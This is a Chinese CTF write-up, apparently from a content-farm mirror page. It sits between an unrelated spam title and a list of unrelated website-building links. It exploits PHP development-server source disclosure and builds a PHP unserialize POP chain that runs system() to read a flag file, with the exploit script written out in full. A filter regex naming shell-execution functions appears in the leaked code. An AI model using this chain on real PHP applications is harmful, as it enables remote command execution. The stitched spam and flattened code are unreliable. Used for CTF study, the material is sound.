当前位置: 首页 > news >正文

网站快速备案安全吗网站后台html编辑器

网站快速备案安全吗,网站后台html编辑器,网上商城系统,国内做网站哪家公司好文章目录 D0nt pl4y g4m3!!! D0n’t pl4y g4m3!!! 打开题目&#xff0c;可以判断这里为php Development Server 启动的服务 查询得知&#xff0c;存在 PHP<7.4.21 Development Server源码泄露漏洞(参考文章) 抓包&#xff0c;构造payload 得到源码 class Pro{private $ex…

文章目录

    • D0n't pl4y g4m3!!!


D0n’t pl4y g4m3!!!

打开题目,可以判断这里为php Development Server 启动的服务

在这里插入图片描述查询得知,存在 PHP<=7.4.21 Development Server源码泄露漏洞(参考文章)
抓包,构造payload
在这里插入图片描述得到源码

class Pro{private $exp;private $rce2;public function __get($name){return $this->$rce2=$this->exp[$rce2];}public  function __toString(){call_user_func('system', "cat /flag");}
}class Yang
{public function __call($name, $ary){if ($this->key === true || $this->finish1->name) {if ($this->finish->finish) {call_user_func($this->now[$name], $ary[0]);}}}public function ycb(){$this->now = 0;return $this->finish->finish;}public function __wakeup(){$this->key = True;}
}
class Cheng
{private $finish;public $name;public function __get($value){return $this->$value = $this->name[$value];}
}
class Bei
{public function __destruct(){if ($this->CTF->ycb()) {$this->fine->YCB1($this->rce, $this->rce1);}}public function __wakeup(){$this->key = false;}
}function prohib($a){$filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";return preg_replace($filter,'',$a);
}$a = $_POST["CTF"];
if (isset($a)){unserialize(prohib($a));
}
?>

还有提示./hint.zip,下载完解压,猜测是某种编码
复制到谷歌,发现GitHub上面有解码工具
在这里插入图片描述然后再回过头看
pop链子:Bei.__destruct()->Yang.__call()
exp

<?php
class Pro  //five
{private $exp;private $rce2;
}class Yang  //one
{public function __call($name, $ary){if ($this->key === true || $this->finish1->name) {if ($this->finish->finish) {call_user_func($this->now[$name], $ary[0]);}}}public function ycb(){$this->now = 0;return $this->finish->finish;}
}
class Cheng  //two
{private $finish;public $name;}
class Bei  //four
{public function __destruct(){if ($this->CTF->ycb()) {$this->fine->YCB1($this->rce, $this->rce1);}}public function __wakeup(){$this->key = false;}
}$a=new Bei();
$a->rce="cat /tmp/catcatf1ag.txt";
$a->rce1="";
$b=new Yang();
$b->finish->finish=true;
$a->CTF=$b;
$c=new Yang();
$c->key=true;
$c->finish->finish=true;
$c->now['YCB1']='system';
$a->fine=$c;
echo urlencode(serialize($a));
?>

得到flag在这里插入图片描述

http://www.yayakq.cn/news/244667/

相关文章:

  • 兰州中川国际机场t3航站楼wordpress 备案号插件
  • 网站做的好的公司名称专业建站网站服务
  • 做网站推荐嘉兴市建设官方网站
  • 免费装修效果图网站小程序哪家公司做的好
  • 做网赌网站做程序员需要什么条件
  • 我的世界皮肤网站做网页设计的标准尺寸
  • 网站建设与推广策划案案例wordpress 支持数据库
  • 班级网站开发环境wordpress 显示子菜单
  • 从零开始学做网站 网站百度上海分公司
  • 菏泽网站备案拍照最新logo设计大赛
  • 许昌做网站汉狮网络网站建设app下载
  • 金湖建设局网站cad做彩图那个网站应用好用
  • 广东住房和城乡建设厅官方网站制作销售网站有哪些
  • 建设工程消防验收网站雏鸟app网站推广
  • 网站开发一般多钱网站导航栏怎么做
  • 西安企业网站排名优化工具珠宝行网站建设方案
  • 网站仿制成都网站建设门户
  • 自己服务器做网站如何备案太平保宝app免费下载二维码
  • 郓城微信网站建设视频类网站如何做缓存
  • 制作响应式网站报价有哪些做淘宝素材的网站
  • 模板建站哪里有淘宝seo是什么意思啊
  • 祥云平台英文网站网站开发python
  • 洋县住房和城乡建设管理局网站制作网站好的公司
  • 图片网站 模板wordpress post 模板
  • 上海网站建设 乐云seo做网站的公司成都
  • com网站注册域名网站开发维护入哪个科目
  • 百度站长平台wordpress怎么上传电影
  • 北京礼品网站建设网站开发税目编码
  • 公司做网站合同电子商务公司的名字
  • 泰州谁会建网站有关做详情页的参考网站